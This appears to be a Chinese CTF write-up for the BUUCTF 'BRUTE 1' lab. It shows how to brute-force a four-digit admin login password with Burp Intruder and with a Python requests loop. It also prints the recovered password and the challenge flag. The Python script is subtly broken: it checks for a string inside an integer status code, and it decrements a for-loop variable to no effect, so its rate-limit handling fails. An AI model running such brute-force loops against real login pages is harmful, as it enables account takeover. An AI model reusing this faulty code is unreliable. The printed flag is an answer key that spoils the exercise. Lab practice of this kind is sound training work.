BUU BRUTE 1

靶场教程

1.开局页面,是个登录界面。
BUU BRUTE 1_第1张图片
2.尝试万能密码,发现并不可行,提示【用户名错误】。用户名输入admin,发现提示密码错误,为四位数字。
BUU BRUTE 1_第2张图片
3.那么,抓包爆破吧。通过burp进行抓包。
BUU BRUTE 1_第3张图片
4.发送包到 Intruder 进行爆破。快捷键 Ctrl + L
BUU BRUTE 1_第4张图片
3.设置爆破数值,进行爆破。在 3 处修改爆破数值0,9999,1即可。【注:已知爆破密码6490,可自定义缩小爆破范围测试】
BUU BRUTE 1_第5张图片
4.开始爆破,发现结果。【密码:6490】
BUU BRUTE 1_第6张图片
5.获得flag

账号:admin
密码:6490
flag{b3e478ac-0cc9-4674-b309-3beffb36009a}

BUU BRUTE 1_第7张图片

方案二

1.通过 python 脚本,获取密码。

import time
import requests

url="http://f6e13443-89ab-43b2-b355-7efe8190c675.node5.buuoj.cn:81/?username=admin&password="

for i in range(6400, 7000):
    res = requests.get(url + str(i))
    print("[*] Try :" + str(i))
    if "429" in res.status_code:
        time.sleep(0.5)
        i = i-1
        continue
    if res.text != "密码错误,为四位数字。":
        print(res.text)
        break

2.获取 flag

账号:admin
密码:6490
flag{b3e478ac-0cc9-4674-b309-3beffb36009a}

你可能感兴趣的:(BUUCTF,web安全,安全,安全性测试,前端)